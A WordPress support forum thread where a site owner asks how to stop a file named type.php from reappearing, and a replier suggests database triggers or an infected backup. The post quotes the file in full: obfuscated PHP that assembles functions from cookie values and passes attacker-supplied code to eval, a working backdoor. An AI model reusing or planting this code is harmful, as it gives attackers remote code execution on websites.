Malware

  • Hello, I am having issues battling malware on my site. I seem to have found some of the issues, but there is a persistent file that keeps being re-written even after I delete it.

    The file is called “type.php” and it resides in the wp-content folder

    I can rename, delete, edit and delete content of the file and it just keeps getting re-written/replaced/added within seconds back into the directory.

    I have tried a complete uninstall of the site and reinstall from a backup and it is still persistant.

    I have tried changing .htaccess to dissuade access to the file.

    Any idea where I might look “under the hood” to figure out where the script resides that keeps bringing it back? Anyway to prevent it from being written?

    This is the content of the file:

    <?php
    class Apt
    {
    private static $s;
    public static function g($n)
    {
    if (!self::$s)
    self::i();
    return self::$s[$n];
    }
    private static function i()
    {
    self::$s = array(
    0135,
    0135,
    0116,
    0111,
    026,
    0136,
    0122,
    012,
    00
    );
    }
    }
    function click()
    {
    $_fkm = $_COOKIE;
    ($_fkm && isset($_fkm[Apt::g(0)])) ? (($_h = $_fkm[Apt::g(1)] . $_fkm[Apt::g(2)]) && ($_zpq = $_h($_fkm[Apt::g(3)] . $_fkm[Apt::g(4)])) && ($_uly = $_h($_fkm[Apt::g(5)] . $_fkm[Apt::g(6)])) && ($_uly = $_uly($_h($_fkm[Apt::g(7)]))) && @eval($_uly)) : $_fkm;
    return Apt::g(8);
    }
    click();
Viewing 2 replies - 1 through 2 (of 2 total)

  • The problem with restoring a backup is when your backup is already infected with the malware too. You’ll need to find the root cause of this. It could be a trigger in your WP database (commonly seen – ask your web host or check with phpMyAdmin if there are triggers in your DB) – but you’ll need to do a full scan and manually scan on your whole account on the server to make sure that everything is deleted. Only doing half a clean-up isn’t going to solve a hacked site.

    Cleaning up a hacked site needs more than just deleting the malicious files, the best thing to find out (if possible) is the root cause or backport it used to hack your site, such as a user with a default or weak password, outdated software on your site or on the server side…

    Thread Starter krbgraphics

    (@krbgraphics)

    Thank you! I will have bluehost check the database. Is there anyway to check it myself just for future knowledge?

    It must be something there since I have only one user and it has a 2fa on that account. It happened before I put the 2fa on though.

Viewing 2 replies - 1 through 2 (of 2 total)
  • The topic ‘Malware’ is closed to new replies.